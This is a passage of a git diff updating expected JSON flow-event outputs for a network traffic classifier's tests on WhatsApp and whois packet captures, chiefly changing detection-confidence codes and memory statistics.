00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1519924083503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924083503,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIKAbs8JoRwJzRhWoAQCAWMQgAAAQEICijlFlQJITj5"} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924083411,"flow_last_seen":1519924083506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1519924083506,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 
-00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":620,"packets-processed":620,"total-skipped-flows":0,"total-l4-payload-len":410343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1519924247388} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 620/620 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5899028 bytes -~~ total memory freed........: 5899028 bytes -~~ total allocations/frees...: 118752/118752 +~~ total memory allocated....: 6032662 bytes +~~ total memory freed........: 6032662 bytes +~~ total allocations/frees...: 121514/121514 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1338 chars 
diff --git a/test/results/whois.pcapng.out b/test/results/whois.pcapng.out index 4907f385e..7f1b8b127 100644 --- a/test/results/whois.pcapng.out +++ b/test/results/whois.pcapng.out 
@@ -4,21 +4,21 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1604305198454} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
